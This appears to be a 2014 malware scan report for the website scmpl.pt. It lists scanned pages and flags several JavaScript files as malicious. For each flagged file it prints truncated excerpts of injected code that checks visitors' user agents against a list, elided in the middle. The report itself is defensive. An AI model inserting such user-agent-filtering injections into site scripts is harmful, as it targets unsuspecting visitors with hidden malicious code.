Scanned pages/files
Request | Server response | Status |
http://scmpl.pt/ | HTTP/1.1 200 OK Connection: close Date: Wed, 27 Aug 2014 00:39:26 GMT Accept-Ranges: bytes Server: Apache Content-Language: pt Content-Length: 594 Content-Type: text/html Last-Modified: Fri, 09 May 2014 09:32:24 GMT | clean |
http://www.scmpl.pt/portal2/ | 200 OK Content-Length: 22037 Content-Type: text/html | clean |
http://www.scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-2.0.3.min.js | 200 OK Content-Length: 83612 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-migrate-1.2.1.js | 200 OK Content-Length: 17142 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/jquery/js/jquery-utils.js | 200 OK Content-Length: 69 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/jqueryui/js/jquery-ui-1.10.3.custom.min.js | 200 OK Content-Length: 228137 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdscriptegrator/libraries/highslide/js/highslide-full.min.js | 200 OK Content-Length: 71460 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/plugins/system/cdcaptcha/js/jquery.cdcaptcha.js | 200 OK Content-Length: 14542 Content-Type: application/javascript | malicious |
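Malicious code - confirmed by antiviruses (see below). The excerpt is truncated: it shows the start of the flagged code, skips the middle (marked [...] below), and ends with what appears to be the tail of the original script. The same opening (stripos and mmm_check_ua, with a blackData list of what look like user-agent substrings) is reported for every file flagged on this page, so each script on the site should be compared against a known-good copy, not only the ones listed here.
(function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' [...] case 0: submitElement.button('disable'); break; case 1: submitElement.button('enable'); break; } }; function empty(mixed_var) { var key;if(mixed_var===""||mixed_var===0||mixed_var==="0"||mixed_var===null||mixed_var===false||typeof mixed_var==='undefined'){return true}if(typeof mixed_var=='object'){for(key in mixed_var){return false}return true}return false; }; })(jQuery); }
Antivirus reports: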
| ||
http://scmpl.pt/portal2/?cdcaptcha=getScript&random=VGe11rF5OHjRvIFt1CgjgsnZqP5Q | 200 OK Content-Length: 564 Content-Type: application/x-javascript | clean |
http://scmpl.pt/portal2/media/system/js/mootools-core.js | 200 OK Content-Length: 101169 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below); the excerpt is truncated, with [...] marking the part that is not shown:
(function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' [...] return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})();
Antivirus reports:
| ||
http://scmpl.pt/portal2/media/system/js/core.js | 200 OK Content-Length: 9591 Content-Type: application/javascript | clean |
http://scmpl.pt/portal2/media/system/js/caption.js | 200 OK Content-Length: 5536 Content-Type: application/javascript | clean |
http://www.scmpl.pt/portal2/modules/mod_bt_contentslider/tmpl/js/slides.js | 200 OK Content-Length: 32966 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below); the excerpt is truncated, with [...] marking the part that is not shown:
(function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' [...] $children.hide(); var indices = []; for (i=0;i<childCount;i++) { indices[indices.length] = i; } indices = indices.sort(randomizeOrder); $.each(indices,function(j,k) { var $child = $children.eq(k); var $clone = $child.clone(true); $clone.show().appendTo($this); if (callback !== undefined) { callback($child, $clone); } $child.remove(); }); } })); }; })(jQuery);
Antivirus reports:
| ||
http://www.scmpl.pt/portal2/modules/mod_bt_contentslider/tmpl/js/default.js | 200 OK Content-Length: 5704 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below); the excerpt is truncated, with [...] marking the part that is not shown:
(function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' [...] } BTCJ('#btcontentslider' + btcModuleIds[i]).slides(btcModuleOpts[i]); if (jQuery("html").css("direction") == "rtl") { jQuery('#btcontentslider' + btcModuleIds[i] + ' .slides_control').css("direction", "rtl"); } } } jQuery('img.hovereffect').hover(function () { jQuery(this).stop(true).animate({ opacity : 0.5 }, 300) }, function () { jQuery(this).animate({ opacity : 1 }, 300) }) })
Antivirus reports:
| ||
http://www.scmpl.pt/portal2/modules/mod_bt_contentslider/tmpl/js/jquery.easing.1.3.js | 200 OK Content-Length: 12878 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below); the excerpt is truncated, with [...] marking the part that is not shown:
(function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' [...] } else if (t < (2/2.75)) { return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return BTCJ.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return BTCJ.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } });
Antivirus reports:
| ||
http://scmpl.pt/portal2/media/system/js/mootools-more.js | 200 OK Content-Length: 243138 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below); the excerpt is truncated, with [...] marking the part that is not shown:
(function(){
function stripos (m_haystack, m_needle, m_offset) { var haystack = (m_haystack + '').toLowerCase(); var needle = (m_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, m_offset)) !== -1) { return index; } return false; } function mmm_check_ua(){ var blackData = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant' [...] Form.Validator.add("validate-currency-yuan",{errorMsg:function(){return Form.Validator.getMsg("currencyYuan");},test:function(a){return Form.Validator.getValidator("IsEmpty").test(a)||(/^￥?\-?([1-9]{1}[0-9]{0,2}(\,[0-9]{3})*(\.[0-9]{0,2})?|[1-9]{1}\d*(\.[0-9]{0,2})?|0(\.[0-9]{0,2})?|(\.[0-9]{1,2})?)$/).test(a.get("value")); }});
Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: scmpl.pt
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 27 Aug 2014 00:39:26 GMT
Accept-Ranges: bytes
Server: Apache
Content-Language: pt
Content-Length: 594
Content-Type: text/html
Last-Modified: Fri, 09 May 2014 09:32:24 GMT
...594 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: scmpl.pt
Referer: http://www.google.com/search?q=scmpl.pt
Result:
The result is similar to the first query. There are no suspicious redirects found. These queries only look at the HTTP response to a plain GET request, so they do not cover script that runs in the visitor's browser, such as the code flagged in the files above.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=scmpl.pt
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://scmpl.pt/
Result: scmpl.pt is not infected or malware details are not published yet.